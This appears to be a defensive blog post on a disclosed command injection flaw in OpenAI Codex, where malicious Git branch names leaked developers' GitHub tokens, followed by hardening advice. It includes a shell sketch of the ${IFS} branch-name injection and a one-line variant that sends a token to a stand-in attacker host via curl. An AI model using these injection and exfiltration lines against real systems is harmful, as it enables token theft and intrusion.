On March 30, 2026, BeyondTrust disclosed a critical command injection vulnerability in OpenAI Codex. The branch name parameter -- the Git branch Codex operates on -- was passed directly into a shell command without sanitization. A semicolon in the branch name gave an attacker arbitrary code execution inside the Codex container, including the ability to exfiltrate the user's GitHub OAuth token.
The automated attack variant is worse. An attacker creates a malicious branch name via the GitHub API, using ${IFS} to replace spaces and bypass GitHub's naming restrictions. Any developer who runs a Codex task against that branch silently leaks their GitHub token. Zero clicks needed. The token gets sent to an attacker-controlled server, and the developer never sees a thing.
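The ${IFS} trick is small enough to sketch in a few lines of shell. This is a hypothetical reconstruction with a benign payload; the unquoted interpolation below stands in for whatever git invocation the vulnerable code performed:

```shell
# A branch name an attacker could create via the API. GitHub refuses
# spaces in ref names, but ${IFS} is just literal text here -- it only
# becomes whitespace once the name reaches an unquoted shell context.
branch='main;echo${IFS}injected'

# If a tool builds its command by string interpolation...
output=$(sh -c "echo fetching $branch")

# ...the inner shell sees two commands: the intended one, then the
# smuggled one (${IFS} expands to whitespace, splitting echo/injected).
echo "$output"
```

Swap `echo${IFS}injected` for `curl${IFS}attacker.example/$TOKEN` and you have the exfiltration variant described above.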
OpenAI patched this on February 5, 2026, rating it P1 Critical. It affected the ChatGPT website, Codex CLI, Codex SDK, and IDE extensions.
The Bigger Problem
This is not just an OpenAI bug. It is a pattern.
AI coding assistants are being given increasing access to development environments: shell execution, file system access, Git operations, API credentials. Teams are connecting these tools to their production repositories, their CI/CD pipelines, their cloud credentials. And the security model for most of these integrations is "trust the tool."
The Codex vulnerability is a textbook shell injection. Passing unsanitized user input into a shell command is one of the oldest categories of security bugs. It is the kind of thing any experienced engineer would catch in a code review. But when the tool doing the execution is an AI assistant running in a sandboxed container, the assumption is that the sandbox handles it. It did not.
What Infrastructure Teams Should Consider
If your developers are using AI coding tools connected to your org's repositories, ask these questions:
- What OAuth scopes are those tokens granted? If Codex had a token with the `repo` scope, the attacker got read and write access to every private repository in the org. Scope tokens to the minimum required.
- Are AI tools running in your CI/CD pipeline? If so, what credentials do they have access to? A compromised AI tool running in a build container has the same access as any other build step.
- Do you audit which branches your team operates on? Malicious branch names sound exotic until you realize anyone with push access to a public fork can create one.
- Are you monitoring outbound network connections from dev environments? The exfiltrated token was sent to an external server. Network monitoring catches this if you have it. Most dev environments do not.
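Auditing scopes, the first question above, is scriptable: GitHub echoes a classic token's granted scopes in the `X-OAuth-Scopes` response header on any authenticated API call. A short sketch (the function names are my own):

```python
import urllib.request


def parse_scopes(header: str) -> list[str]:
    """Split GitHub's comma-separated X-OAuth-Scopes header value."""
    return [s.strip() for s in header.split(",") if s.strip()]


def token_scopes(token: str) -> list[str]:
    """Return the scopes GitHub reports for a classic OAuth token."""
    req = urllib.request.Request(
        "https://api.github.com/user",
        headers={"Authorization": f"Bearer {token}"},
    )
    with urllib.request.urlopen(req) as resp:
        return parse_scopes(resp.headers.get("X-OAuth-Scopes", ""))


# Flag the broad scopes that would have made this breach org-wide.
BROAD = {"repo", "admin:org", "workflow"}
```

Run `token_scopes` across your org's service tokens and flag anything intersecting `BROAD`; fine-grained personal access tokens, which carry per-repository permissions instead of org-wide scopes, sidestep the problem entirely.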
The Takeaway
AI dev tools are powerful and they are here to stay. But every new tool you connect to your development infrastructure is an expansion of your attack surface. The Codex vulnerability was patched quickly, but it exposed a fundamental gap: teams are granting AI tools deep access to their code and credentials without applying the same security scrutiny they would give to any other third-party integration.
Treat AI coding assistants like any other service with access to your infrastructure. Scope their permissions. Monitor their network activity. Review what they can reach. The convenience is real, but so is the risk.
Source: BeyondTrust technical analysis via r/sysadmin discussion